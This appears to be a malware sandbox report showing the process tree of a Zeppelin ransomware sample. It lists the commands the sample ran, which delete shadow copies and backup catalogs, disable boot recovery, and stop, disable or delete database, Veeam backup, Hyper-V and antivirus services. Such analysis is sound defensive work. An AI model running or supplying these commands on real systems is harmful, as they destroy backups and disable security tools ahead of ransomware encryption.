description pid Process procid_target PID 2700 wrote to memory of 2376 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 28 PID 2700 wrote to memory of 2376 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 28 PID 2700 wrote to memory of 2376 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 28 PID 2700 wrote to memory of 2376 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 28 PID 2700 wrote to memory of 2968 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 30 PID 2700 wrote to memory of 2968 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 30 PID 2700 wrote to memory of 2968 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 30 PID 2700 wrote to memory of 2968 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 30 PID 2700 wrote to memory of 2580 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 31 PID 2700 wrote to memory of 2580 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 31 PID 2700 wrote to memory of 2580 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 31 PID 2700 wrote to memory of 2580 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 31 PID 2700 wrote to memory of 2632 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 32 PID 2700 wrote to memory of 2632 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 32 PID 2700 wrote to memory of 2632 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 32 PID 2700 wrote to memory of 2632 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 32 PID 2700 wrote to memory of 2664 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 34 PID 2700 wrote to memory of 2664 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 34 PID 2700 wrote to memory of 2664 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 34 PID 2700 wrote to memory of 2664 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 34 PID 2700 wrote to memory of 2576 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 37 PID 2700 wrote to memory of 2576 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 37 PID 2700 wrote to memory of 2576 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 37 PID 2700 wrote to memory of 2576 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 37 PID 2700 wrote to memory of 2692 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 38 PID 2700 wrote to memory of 2692 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 38 PID 2700 wrote to memory of 2692 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 38 PID 2700 wrote to memory of 2692 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 38 PID 2700 wrote to memory of 2680 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 39 PID 2700 wrote to memory of 2680 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 39 PID 2700 wrote to memory of 2680 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 39 PID 2700 wrote to memory of 2680 2700 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe 39 PID 2664 wrote to memory of 2604 2664 cmd.exe 43 PID 2664 wrote to memory of 2604 2664 cmd.exe 43 PID 2664 wrote to memory of 2604 2664 cmd.exe 43 PID 2664 wrote to memory of 2604 2664 cmd.exe 43 PID 2576 wrote to memory of 2544 2576 cmd.exe 42 PID 2576 wrote to memory of 2544 2576 cmd.exe 42 PID 2576 wrote to memory of 2544 2576 cmd.exe 42 PID 2576 wrote to memory of 2544 2576 cmd.exe 42 PID 2376 wrote to memory of 2508 2376 cmd.exe 44 PID 2376 wrote to memory of 2508 2376 cmd.exe 44 PID 2376 wrote to memory of 2508 2376 cmd.exe 44 PID 2376 wrote to memory of 2508 2376 cmd.exe 44 PID 2576 wrote to memory of 2312 2576 cmd.exe 47 PID 2576 wrote to memory of 2312 2576 cmd.exe 47 PID 2576 wrote to memory of 2312 2576 cmd.exe 47 PID 2576 wrote to memory of 2312 2576 cmd.exe 47 PID 2576 wrote to memory of 2168 2576 cmd.exe 48 PID 2576 wrote to memory of 2168 2576 cmd.exe 48 PID 2576 wrote to memory of 2168 2576 cmd.exe 48 PID 2576 wrote to memory of 2168 2576 cmd.exe 48 PID 2576 wrote to memory of 1772 2576 cmd.exe 49 PID 2576 wrote to memory of 1772 2576 cmd.exe 49 PID 2576 wrote to memory of 1772 2576 cmd.exe 49 PID 2576 wrote to memory of 1772 2576 cmd.exe 49 PID 2576 wrote to memory of 2384 2576 cmd.exe 50 PID 2576 wrote to memory of 2384 2576 cmd.exe 50 PID 2576 wrote to memory of 2384 2576 cmd.exe 50 PID 2576 wrote to memory of 2384 2576 cmd.exe 50 PID 2576 wrote to memory of 2768 2576 cmd.exe 51 PID 2576 wrote to memory of 2768 2576 cmd.exe 51 PID 2576 wrote to memory of 2768 2576 cmd.exe 51 PID 2576 wrote to memory of 2768 2576 cmd.exe 51 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe"C:\Users\Admin\AppData\Local\Temp\2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe"1⤵
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete2⤵
- Suspicious use of WriteProcessMemory
PID:2376 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2508
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no2⤵PID:2968
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵PID:2580
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet2⤵PID:2632
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet2⤵
- Suspicious use of WriteProcessMemory
PID:2664 -
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2604
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat2⤵
- Suspicious use of WriteProcessMemory
PID:2576 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2544
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2312
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe resize shadowstorage /for=C: /on=C: /maxsize=401MB3⤵
- Interacts with shadow copies
PID:2168
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe resize shadowstorage /for=D: /on=D: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1772
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe resize shadowstorage /for=F: /on=F: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2384
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe resize shadowstorage /for=G: /on=G: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2768
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe resize shadowstorage /for=H: /on=H: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2052
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe resize shadowstorage /for=J: /on=J: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2288
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe resize shadowstorage /for=K: /on=K: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2436
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe resize shadowstorage /for=L: /on=L: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:636
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe resize shadowstorage /for=M: /on=M: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1408
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe resize shadowstorage /for=N: /on=N: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:696
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC.exe shadowcopy delete /nointeractive3⤵PID:320
-
-
C:\Windows\SysWOW64\sc.exesc stop MSSQLFDLauncher$CITRIX3⤵PID:2588
-
-
C:\Windows\SysWOW64\sc.exesc config MSSQLFDLauncher$CITRIX start=disabled3⤵PID:2344
-
-
C:\Windows\SysWOW64\sc.exesc stop MSSQLFDLauncher3⤵PID:2324
-
-
C:\Windows\SysWOW64\sc.exesc config MSSQLFDLauncher start=disabled3⤵
- Launches sc.exe
PID:1560
-
-
C:\Windows\SysWOW64\sc.exesc stop MSSQL$CITRIX3⤵PID:1692
-
-
C:\Windows\SysWOW64\sc.exesc config MSSQL$CITRIX start=disabled3⤵PID:1492
-
-
C:\Windows\SysWOW64\sc.exesc stop MSSQLSERVER3⤵PID:1828
-
-
C:\Windows\SysWOW64\sc.exesc config MSSQLSERVER start=disabled3⤵PID:768
-
-
C:\Windows\SysWOW64\sc.exesc stop SQLSERVERAGENT3⤵PID:2924
-
-
C:\Windows\SysWOW64\sc.exesc config SQLSERVERAGENT start=disabled3⤵PID:1748
-
-
C:\Windows\SysWOW64\sc.exesc stop MSOLAP$CITRIX3⤵
- Launches sc.exe
PID:2472
-
-
C:\Windows\SysWOW64\sc.exesc config MSOLAP$CITRIX start=disabled3⤵PID:2828
-
-
C:\Windows\SysWOW64\sc.exesc stop SQLBrowser3⤵
- Launches sc.exe
PID:1364
-
-
C:\Windows\SysWOW64\sc.exesc config SQLBrowser start=disabled3⤵PID:1648
-
-
C:\Windows\SysWOW64\sc.exesc stop SQLWriter3⤵
- Launches sc.exe
PID:992
-
-
C:\Windows\SysWOW64\sc.exesc config SQLWriter start=disabled3⤵
- Launches sc.exe
PID:2172
-
-
C:\Windows\SysWOW64\sc.exesc stop MSSQL$SQLEXPRESS3⤵PID:2704
-
-
C:\Windows\SysWOW64\sc.exesc config MSSQL$SQLEXPRESS start=disabled3⤵
- Launches sc.exe
PID:1460
-
-
C:\Windows\SysWOW64\sc.exesc stop MSSQLSERVER3⤵PID:1904
-
-
C:\Windows\SysWOW64\sc.exesc config MSSQLSERVER start=disabled3⤵PID:2972
-
-
C:\Windows\SysWOW64\sc.exesc stop postgresql-9.53⤵PID:320
-
-
C:\Windows\SysWOW64\sc.exesc config postgresql-9.5 start=disabled3⤵
- Launches sc.exe
PID:2596
-
-
C:\Windows\SysWOW64\sc.exesc stop fsdevcon3⤵PID:1352
-
-
C:\Windows\SysWOW64\sc.exesc config fsdevcon start=disabled3⤵PID:552
-
-
C:\Windows\SysWOW64\sc.exesc stop fshoster3⤵
- Launches sc.exe
PID:1536
-
-
C:\Windows\SysWOW64\sc.exesc config fshoster start=disabled3⤵PID:2588
-
-
C:\Windows\SysWOW64\sc.exesc stop fsnethoster3⤵PID:1884
-
-
C:\Windows\SysWOW64\sc.exesc config fsnethoster start=disabled3⤵PID:2124
-
-
C:\Windows\SysWOW64\sc.exesc stop fsulhoster3⤵
- Launches sc.exe
PID:1584
-
-
C:\Windows\SysWOW64\sc.exesc config fsulhoster start=disabled3⤵PID:2172
-
-
C:\Windows\SysWOW64\sc.exesc stop fsulnethoster3⤵
- Launches sc.exe
PID:2660
-
-
C:\Windows\SysWOW64\sc.exesc config fsulnethoster start=disabled3⤵
- Launches sc.exe
PID:1832
-
-
C:\Windows\SysWOW64\sc.exesc stop fsulorsp3⤵
- Launches sc.exe
PID:1592
-
-
C:\Windows\SysWOW64\sc.exesc config fsulorsp start=disabled3⤵PID:2656
-
-
C:\Windows\SysWOW64\sc.exesc stop fsulprothoster3⤵PID:1984
-
-
C:\Windows\SysWOW64\sc.exesc config fsulprothoster start=disabled3⤵PID:1516
-
-
C:\Windows\SysWOW64\sc.exesc stop FSAUS3⤵PID:2924
-
-
C:\Windows\SysWOW64\sc.exesc config FSAUS start=disabled3⤵PID:540
-
-
C:\Windows\SysWOW64\sc.exesc stop fsms3⤵PID:3016
-
-
C:\Windows\SysWOW64\sc.exesc config fsms start=disabled3⤵
- Launches sc.exe
PID:848
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamAWSSvc3⤵PID:2724
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamAWSSvc start=disabled3⤵PID:2584
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamAzureSvc3⤵
- Launches sc.exe
PID:2360
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamAzureSvc start=disabled3⤵
- Launches sc.exe
PID:1268
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamEnterpriseManagerSvc3⤵PID:2608
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamEnterpriseManagerSvc start=disabled3⤵PID:1408
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamBackupRESTSvc3⤵
- Launches sc.exe
PID:772
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamBackupRESTSvc start=disabled3⤵PID:924
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamBackupSvc3⤵PID:1148
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamBackupSvc start=disabled3⤵PID:1032
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamFilesysVssSvc3⤵PID:2308
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamFilesysVssSvc start=disabled3⤵PID:336
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamBrokerSvc3⤵PID:1288
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamBrokerSvc start=disabled3⤵PID:1292
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamBackupCdpSvc3⤵PID:1992
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamBackupCdpSvc start=disabled3⤵PID:1500
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamCloudSvc3⤵PID:2312
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamCloudSvc start=disabled3⤵
- Launches sc.exe
PID:2944
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamTransportSvc3⤵PID:1472
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamTransportSvc start=disabled3⤵PID:540
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamDistributionSvc3⤵PID:784
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamDistributionSvc start=disabled3⤵PID:1968
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamExplorersRecoverySvc3⤵PID:2452
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamExplorersRecoverySvc start=disabled3⤵PID:2504
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamGCPSvc3⤵PID:2420
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamGCPSvc start=disabled3⤵PID:804
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamGuestHelper3⤵
- Launches sc.exe
PID:2344
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamGuestHelper start=disabled3⤵PID:1920
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamCatalogSvc3⤵
- Launches sc.exe
PID:308
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamCatalogSvc start=disabled3⤵PID:2972
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamHvIntegrationSvc3⤵PID:2548
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamHvIntegrationSvc start=disabled3⤵PID:2856
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamDeploySvc3⤵PID:1792
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamDeploySvc start=disabled3⤵PID:1248
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamMountSvc3⤵PID:2940
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamMountSvc start=disabled3⤵PID:1492
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamRESTSvc3⤵
- Launches sc.exe
PID:2256
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamRESTSvc start=disabled3⤵PID:1900
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamNFSSvc3⤵PID:1952
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamNFSSvc start=disabled3⤵PID:872
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamVssProviderSvc3⤵PID:592
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamVssProviderSvc start=disabled3⤵PID:2780
-
-
C:\Windows\SysWOW64\sc.exesc stop MSSQLFDLauncher$CITRIX3⤵PID:2248
-
-
C:\Windows\SysWOW64\sc.exesc config MSSQLFDLauncher$CITRIX start= disabled3⤵PID:2724
-
-
C:\Windows\SysWOW64\sc.exesc stop MSSQL$VEEAMSQL20163⤵PID:2672
-
-
C:\Windows\SysWOW64\sc.exesc config MSSQL$VEEAMSQL2016 start=disabled3⤵PID:2436
-
-
C:\Windows\SysWOW64\sc.exesc stop SQLBrowser3⤵
- Launches sc.exe
PID:1792
-
-
C:\Windows\SysWOW64\sc.exesc config SQLBrowser start=disabled3⤵PID:1104
-
-
C:\Windows\SysWOW64\sc.exesc stop SQLTELEMETRY$VEEAMSQL20163⤵PID:2964
-
-
C:\Windows\SysWOW64\sc.exesc config SQLTELEMETRY$VEEAMSQL2016 start=disabled3⤵PID:592
-
-
C:\Windows\SysWOW64\sc.exesc stop SQLWriter3⤵PID:1980
-
-
C:\Windows\SysWOW64\sc.exesc config SQLWriter start=disabled3⤵
- Launches sc.exe
PID:1292
-
-
C:\Windows\SysWOW64\sc.exesc stop SageMySQL3⤵PID:2588
-
-
C:\Windows\SysWOW64\sc.exesc config SageMySQL start=disabled3⤵PID:1556
-
-
C:\Windows\SysWOW64\sc.exesc stop SQLTELEMETRY$VEEAMSQL20163⤵PID:2036
-
-
C:\Windows\SysWOW64\sc.exesc config SQLTELEMETRY$VEEAMSQL2016 start=disabled3⤵PID:2492
-
-
C:\Windows\SysWOW64\sc.exesc stop ReportServer$V4SQLEXPRESS3⤵PID:2032
-
-
C:\Windows\SysWOW64\sc.exesc config ReportServer$V4SQLEXPRESS start=disabled3⤵
- Launches sc.exe
PID:1656
-
-
C:\Windows\SysWOW64\sc.exesc stop SQLTELEMETRY$SDPRO_V4_SQL3⤵
- Launches sc.exe
PID:2540
-
-
C:\Windows\SysWOW64\sc.exesc config SQLTELEMETRY$SDPRO_V4_SQL start=disabled3⤵PID:1692
-
-
C:\Windows\SysWOW64\sc.exesc stop MSSQL$MICROSOFT##WID3⤵PID:2600
-
-
C:\Windows\SysWOW64\sc.exesc config MSSQL$MICROSOFT##WID start=disabled3⤵PID:2704
-
-
C:\Windows\SysWOW64\sc.exesc stop MSSQLServerOLAPService3⤵
- Launches sc.exe
PID:2496
-
-
C:\Windows\SysWOW64\sc.exesc config MSSQLServerOLAPService start=disabled3⤵PID:2144
-
-
C:\Windows\SysWOW64\sc.exesc stop MSSQLFDLauncher3⤵PID:2712
-
-
C:\Windows\SysWOW64\sc.exesc config MSSQLFDLauncher start=disabled3⤵
- Launches sc.exe
PID:580
-
-
C:\Windows\SysWOW64\sc.exesc stop SQLSERVERAGENT3⤵
- Launches sc.exe
PID:992
-
-
C:\Windows\SysWOW64\sc.exesc config SQLSERVERAGENT start=disabled3⤵PID:2220
-
-
C:\Windows\SysWOW64\sc.exesc stop MSSQLSERVER3⤵PID:908
-
-
C:\Windows\SysWOW64\sc.exesc config MSSQLSERVER start=disabled3⤵PID:2020
-
-
C:\Windows\SysWOW64\sc.exesc stop SQLTELEMETRY3⤵
- Launches sc.exe
PID:2768
-
-
C:\Windows\SysWOW64\sc.exesc config SQLTELEMETRY start=disabled3⤵PID:2584
-
-
C:\Windows\SysWOW64\sc.exesc stop MsDtsServer1303⤵
- Launches sc.exe
PID:1244
-
-
C:\Windows\SysWOW64\sc.exesc config MsDtsServer130 start=disabled3⤵
- Launches sc.exe
PID:2168
-
-
C:\Windows\SysWOW64\sc.exesc stop SQLTELEMETRY$BVMS3⤵PID:1180
-
-
C:\Windows\SysWOW64\sc.exesc config SQLTELEMETRY$BVMS start=disabled3⤵PID:596
-
-
C:\Windows\SysWOW64\sc.exesc stop MSSQL$SQLEXPRESS20143⤵PID:1280
-
-
C:\Windows\SysWOW64\sc.exesc config MSSQL$SQLEXPRESS2014 start=disabled3⤵PID:2932
-
-
C:\Windows\SysWOW64\sc.exesc stop MSSQLSERVER3⤵PID:1500
-
-
C:\Windows\SysWOW64\sc.exesc config MSSQLSERVER start=disabled3⤵PID:804
-
-
C:\Windows\SysWOW64\sc.exesc delete "vmickvpexchange"3⤵PID:2468
-
-
C:\Windows\SysWOW64\sc.exesc delete "vmicguestinterface"3⤵
- Launches sc.exe
PID:920
-
-
C:\Windows\SysWOW64\sc.exesc delete "vmicshutdown"3⤵PID:2920
-
-
C:\Windows\SysWOW64\sc.exesc delete "vmicheartbeat"3⤵
- Launches sc.exe
PID:1292
-
-
C:\Windows\SysWOW64\sc.exesc delete "vmicrdv"3⤵PID:2328
-
-
C:\Windows\SysWOW64\sc.exesc delete "storflt"3⤵
- Launches sc.exe
PID:896
-
-
C:\Windows\SysWOW64\sc.exesc delete "vmictimesync"3⤵PID:2000
-
-
C:\Windows\SysWOW64\sc.exesc delete "vmicvss"3⤵PID:1680
-
-
C:\Windows\SysWOW64\sc.exesc delete "hvdsvc"3⤵PID:2384
-
-
C:\Windows\SysWOW64\sc.exesc delete "nvspwmi"3⤵PID:2352
-
-
C:\Windows\SysWOW64\sc.exesc delete "wmms"3⤵PID:1524
-
-
C:\Windows\SysWOW64\sc.exesc delete "AvgAdminServer"3⤵
- Launches sc.exe
PID:1972
-
-
C:\Windows\SysWOW64\sc.exesc delete "AVG Antivirus"3⤵PID:2960
-
-
C:\Windows\SysWOW64\sc.exesc delete "avgAdminClient"3⤵PID:1956
-
-
C:\Windows\SysWOW64\sc.exesc delete "SAVService"3⤵PID:2732
-
-
C:\Windows\SysWOW64\sc.exesc delete "SAVAdminService"3⤵
- Launches sc.exe
PID:1980
-
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos AutoUpdate Service"3⤵PID:2020
-
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Clean Service"3⤵PID:2648
-
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Device Control Service"3⤵PID:2852
-
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Endpoint Defense Service"3⤵PID:280
-
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos File Scanner Service"3⤵
- Launches sc.exe
PID:1524
-
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Health Service"3⤵
- Launches sc.exe
PID:1960
-
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos MCS Agent"3⤵
- Launches sc.exe
PID:1404
-
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos MCS Client"3⤵PID:3052
-
-
C:\Windows\SysWOW64\sc.exesc delete "SntpService"3⤵PID:2340
-
-
C:\Windows\SysWOW64\sc.exesc delete "swc_service"3⤵PID:3012
-
-
C:\Windows\SysWOW64\sc.exesc delete "swi_service"3⤵PID:1320
-
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos UI"3⤵
- Launches sc.exe
PID:2620
-
-
C:\Windows\SysWOW64\sc.exesc delete "swi_update"3⤵PID:2588
-
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Web Control Service"3⤵
- Launches sc.exe
PID:1248
-
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos System Protection Service"3⤵PID:3044
-
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Safestore Service"3⤵
- Launches sc.exe
PID:2160
-
-
C:\Windows\SysWOW64\sc.exesc delete "hmpalertsvc"3⤵PID:1192
-
-
C:\Windows\SysWOW64\sc.exesc delete "RpcEptMapper"3⤵PID:324
-
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Endpoint Defense Service"3⤵PID:2516
-
-
C:\Windows\SysWOW64\sc.exesc delete "SophosFIM"3⤵PID:1832
-
-
C:\Windows\SysWOW64\sc.exesc delete "swi_filter"3⤵PID:2196
-
-
C:\Windows\SysWOW64\sc.exesc delete "FirebirdGuardianDefaultInstance"3⤵PID:2360
-
-
C:\Windows\SysWOW64\sc.exesc delete "FirebirdServerDefaultInstance"3⤵PID:2396
-
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLFDLauncher"3⤵PID:1020
-
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLSERVER"3⤵PID:900
-
-
C:\Windows\SysWOW64\sc.exesc delete "SQLSERVERAGENT"3⤵PID:1940
-
-
C:\Windows\SysWOW64\sc.exesc delete "SQLBrowser"3⤵
- Launches sc.exe
PID:284
-
-
C:\Windows\SysWOW64\sc.exesc delete "SQLTELEMETRY"3⤵PID:2000
-
-
C:\Windows\SysWOW64\sc.exesc delete "MsDtsServer130"3⤵PID:2020
-
-
C:\Windows\SysWOW64\sc.exesc delete "SSISTELEMETRY130"3⤵PID:1236
-
-
C:\Windows\SysWOW64\sc.exesc delete "SQLWriter"3⤵
- Launches sc.exe
PID:472
-
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQL$VEEAMSQL2012"3⤵PID:2320
-
-
C:\Windows\SysWOW64\sc.exesc delete "SQLAgent$VEEAMSQL2012"3⤵
- Launches sc.exe
PID:2404
-
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQL"3⤵
- Launches sc.exe
PID:1984
-
-
C:\Windows\SysWOW64\sc.exesc delete "SQLAgent"3⤵PID:2756
-
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLServerADHelper100"3⤵PID:2620
-
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLServerOLAPService"3⤵PID:1448
-
-
C:\Windows\SysWOW64\sc.exesc delete "MsDtsServer100"3⤵
- Launches sc.exe
PID:1500
-
-
C:\Windows\SysWOW64\sc.exesc delete "ReportServer"3⤵PID:1064
-
-
C:\Windows\SysWOW64\sc.exesc delete "SQLTELEMETRY$HL"3⤵PID:360
-
-
C:\Windows\SysWOW64\sc.exesc delete "TMBMServer"3⤵PID:2960
-
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQL$PROGID"3⤵
- Launches sc.exe
PID:1248
-
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQL$WOLTERSKLUWER"3⤵PID:1692
-
-
C:\Windows\SysWOW64\sc.exesc delete "SQLAgent$PROGID"3⤵PID:2152
-
-
C:\Windows\SysWOW64\sc.exesc delete "SQLAgent$WOLTERSKLUWER"3⤵PID:2860
-
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLFDLauncher$OPTIMA"3⤵PID:2456
-
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQL$OPTIMA"3⤵PID:1900
-
-
C:\Windows\SysWOW64\sc.exesc delete "SQLAgent$OPTIMA"3⤵
- Launches sc.exe
PID:2828
-
-
C:\Windows\SysWOW64\sc.exesc delete "ReportServer$OPTIMA"3⤵
- Launches sc.exe
PID:804
-
-
C:\Windows\SysWOW64\sc.exesc delete "msftesql$SQLEXPRESS"3⤵PID:3064
-
-
C:\Windows\SysWOW64\sc.exesc delete "postgresql-x64-9.4"3⤵PID:488
-
-
C:\Windows\SysWOW64\sc.exesc delete "WRSVC"3⤵
- Launches sc.exe
PID:872
-
-
C:\Windows\SysWOW64\sc.exesc delete "ekrn"3⤵PID:912
-
-
C:\Windows\SysWOW64\sc.exesc delete "ekrnEpsw"3⤵
- Launches sc.exe
PID:592
-
-
C:\Windows\SysWOW64\sc.exesc delete "klim6"3⤵PID:2852
-
-
C:\Windows\SysWOW64\sc.exesc delete "AVP18.0.0"3⤵
- Launches sc.exe
PID:2256
-
-
C:\Windows\SysWOW64\sc.exesc delete "KLIF"3⤵
- Launches sc.exe
PID:1468
-
-
C:\Windows\SysWOW64\sc.exesc delete "klpd"3⤵PID:2432
-
-
C:\Windows\SysWOW64\sc.exesc delete "klflt"3⤵
- Launches sc.exe
PID:2184
-
-
C:\Windows\SysWOW64\sc.exesc delete "klbackupdisk"3⤵
- Launches sc.exe
PID:2176
-
-
C:\Windows\SysWOW64\sc.exesc delete "klbackupflt"3⤵PID:1644
-
-
C:\Windows\SysWOW64\sc.exesc delete "klkbdflt"3⤵PID:1052
-
-
C:\Windows\SysWOW64\sc.exesc delete "klmouflt"3⤵PID:1600
-
-
